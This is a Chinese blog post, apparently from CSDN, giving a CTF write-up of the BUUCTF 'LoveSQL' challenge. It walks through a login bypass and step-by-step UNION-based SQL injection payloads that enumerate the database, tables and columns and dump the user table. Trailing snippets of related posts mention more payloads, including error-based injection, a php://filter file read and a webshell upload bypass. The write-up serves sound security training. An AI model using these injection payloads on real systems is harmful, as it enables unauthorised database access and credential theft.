buuctf [极客大挑战 2019]LoveSQL

最新推荐文章于 2021-12-04 16:06:34 发布
最新推荐文章于 2021-12-04 16:06:34 发布
阅读量148 收藏
点赞数
分类专栏: buuctf web 文章标签: 网络安全 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/114379824
版权

又一次来到性感又有趣的题目
在这里插入图片描述
发现登录框,我们再试试万能密码登录,
在登录框中输入:

用户名:1' or 1=1#
密码:随便输

在这里插入图片描述
发现直接出密码,试试MD5解密,md5解密失败,接着回到注入的地方康康
在url中输入:

/check.php?username=admin' order by 3%23&password=1     存在
/check.php?username=admin' order by 4%23&password=1     报错

注意:sql注入结尾的时候不能用#,而用其url编码%23
在这里插入图片描述
共3个字段。使用union select联合查询

/check.php?username=1' union select 1,2,3%23&password=1

得到回显点位为2和3,查询当前数据库名及版本:

/check.php?username=1' union select 1,database(),version()%23&password=1

在这里插入图片描述
查询到当前数据库为geek,然后查询数据库的表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
查询到两个表,我们在l0ve1ysq1这个表下查询字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述
得到三个字段,爆出数据得到flag

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述

exploitsec
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 550
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1199
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
BUUCTF [极客挑战 2019] LoveSQL
Senimo
03-25 3425
BUUCTF [极客挑战 2019] LoveSQL writeup 打开靶场,访问题目: 尝试登陆: 因为之前一题:BUUCTF 极客挑战 2019 EasySQL使用了万能密码完成了注入,所以再次尝试: xxx.buuoj.cn/check.php ?username=admin' or '1'='1 &password=1 得到了用户名和密码: 尝试密码md5解密失败,还...
[极客挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
[极客挑战 2019]LoveSQL wp
{OvEr}的博客
11-19 180
[极客挑战 2019]LoveSQL wp 打开页面是这样的,我们先试试万能密码 显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。 首先我们来查列数,注入 ?username=admin&password=123 %27 order by 4%23 发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句 ?username=admin&password=123 %27 union select 1,2,3 %23 找到注入点是2,3
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2208
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
BUUCTF[极客挑战 2019]Secret File
楼阁de猫的博客
10-09 140
#[极客挑战 2019]Secret File 打开网址是这个界面 发现页面是黑色的背景,可能有东西被隐藏了,Ctrl+A全选一下试试 果然有东西。发现了一句话在网页最后,点进去看看 这里还有一个网页,点进去看看 什么玩意,难道刚刚闪过去一个页面我没看到?倒过去看也什么都没看出来 那可能是这样的,那就抓包一下 果然有东西,发现了secr3t.php 访问一下 发现过滤了这些东西,但是没有过滤file,可以使用php的伪协议继续 ?file=php://filter/read=convert.b
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 210
这一题和easysql页面一样
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 167
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1793
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
[极客挑战2021]web wp
cosmoslin的博客
11-26 4173
极客挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark Tor浏览器访问即可 babysql 查库:babysql uname=-1' union select database(),2,3,4#&pwd=1 查表:jeff,jeffjokes uname=-1' union select group_concat(table_name),2,3,4 fro
BUUCTF——[极客挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5771
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
wasm逆向——(极客挑战2021wasm
weixin_52369224的博客
11-28 7307
WebAssembly是一种全新的Web编程语言,但是与JavaScript不同,它不是一种让你直接手动编写的语言,而是C / C ++,Rust,C#和TypeScript等不断增加的上层语言的编译目标。 wasm是基于堆栈的虚拟机的二进制指令格式 wabt包安装 尝试了gitclone的方法,一直没安装成功,尝试: sudo apt install wabt 我的环境:ubuntu20.4 WABT(我们将其称为“ wabbit”)是用于WebAssembly的一套工具,包括: wa.
日常练习之web极客挑战 2019 BuyFlag)
doraemon12345的博客
11-30 164
打开题目没看懂,让干嘛的,在右上角发现pyflag字样 点进去看看,也没啥有用的信息,f12看一下源码发现提示 需要post传入password和money,要让password=404 ,发现函数is_numeric,去学习一下 说白了就是一个判断变量的函数,空格,%00,%20,这类的都可以绕过,后来我自己试验了一下发现这道题404后面跟一个字符(a,b,!,*等等可以自己试一下)也可以绕过,先传参抓包。 出现一个user=0,给他改成user=1。 如果你money不够多就会出现loser 太惨了
Writeup】第六季极客挑战(部分题目)
企鹅学coding~
10-31 6866
好久没做CTF题了,一是感觉前几次网赛被虐的够呛,二是各种杂事也越来越多。偶然看到了网上这套成都信息工程大学的练习题,感觉难度上比较适合我这种菜鸟,于是抽空做了一些,然而由于水平和时间原因最终也才完成11/41,这里就记录一下我解出的11道题。以及将来学会的题,也会在后面增加。
[原题复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 2970
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
buuctf:[极客挑战 2019]Http
qq_53030229的博客
10-24 1356
文章目录一、检查源代码二、伪造referer三、伪装Syclover浏览器四、本地访问 估计我在类型题目做的有点少,发现好多博客不友好,这篇博客用我刚入门视野带你们做题。 一、检查源代码 1、方法一:调出控制台,进入Secret.php页面 方法二:这是我在网上找到的第二种方法,对于我来说感觉挺新奇的,使用burp抓包也能找到secret.php页面。 二、伪造referer Referer:告诉服务器该网页是从哪个页面链接过来的 1、按照题目说的不是来自这个地址,一般都是来自这里,所以我们便伪造ref
BUUCTF:[极客挑战 2019]EasySQL
Starbright.的博客
10-29 1399
账户: admin 'or '1'='1'# 万能密码: 'or '1'='1'# ' or 1='1
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值